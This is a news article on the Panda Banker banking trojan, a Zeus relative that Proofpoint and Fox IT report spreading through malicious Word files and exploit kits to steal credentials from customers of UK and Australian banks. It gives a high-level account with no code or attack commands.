14 DAY TRIAL // Malware analysts from Proofpoint and Fox IT InTELL have come across a new banking trojan, related to the old Zeus trojan, targeting banks in Australia and the UK.
Detected for the first time on March 10, this new banking trojan, named Panda Banker, spreads as all other banking trojans, via weaponized Word files.
These Word files either use vulnerabilities in Microsoft Office (CVE-2014-1761 and CVE-2012-0158) or rely on social engineering tricks, trying to convince users to enable Macro support in the Word files.
Once this happens and Panda Banker gets a foothold on the victim's PC, it gathers information about the local target and sends it to its C&C (command and control) server, which creates a fingerprint for the infected host so that it would be able to distinguish it from other bots.
Panda Banker only targets banks activating in UK, Australia
The information Panda Banker sends to its C&C server from each target includes current username, installed antivirus and firewall solutions, OS version information, computer name, local time, and many more.
The server then responds with a configuration file in JSON format, with a list of alternative C&C domains, and a list of websites where the banking trojan should insert malicious code.
These latter websites are nothing more than banking portals. Proofpoint has seen this the trojan targeting the clients of banks like Santander Bank, Lloyds Bank, Bank of Scotland, TSB, and Halifax UK.
Panda Banker also distributed via exploit kits
Its normal mode of operation resembles Zeus', which hijacks browser processes and inject malicious code into the Web page of the aforementioned banking portals, stealing the user's login credentials.
Besides infecting users via Word files, Proofpoint has also seen the crooks employ three different exploit kits (Angler, Nuclear, and Neutrino) to deliver their trojan to unsuspecting victims. The strangest detail about this campaign is that the crooks used geo-location filters so only Australian and British users would be infected.
"Like many modern banking Trojans, Panda Banker appears to have roots in Zeus with sophisticated means of establishing persistence and uses in both targeted and widespread attacks," ProofPoint noted. "Banking Trojans like Zeus, Dyre, Tinba, and Dridex have netted cybercriminals billions of dollars by stealing banking credentials and, in many cases, generating fraudulent transactions."
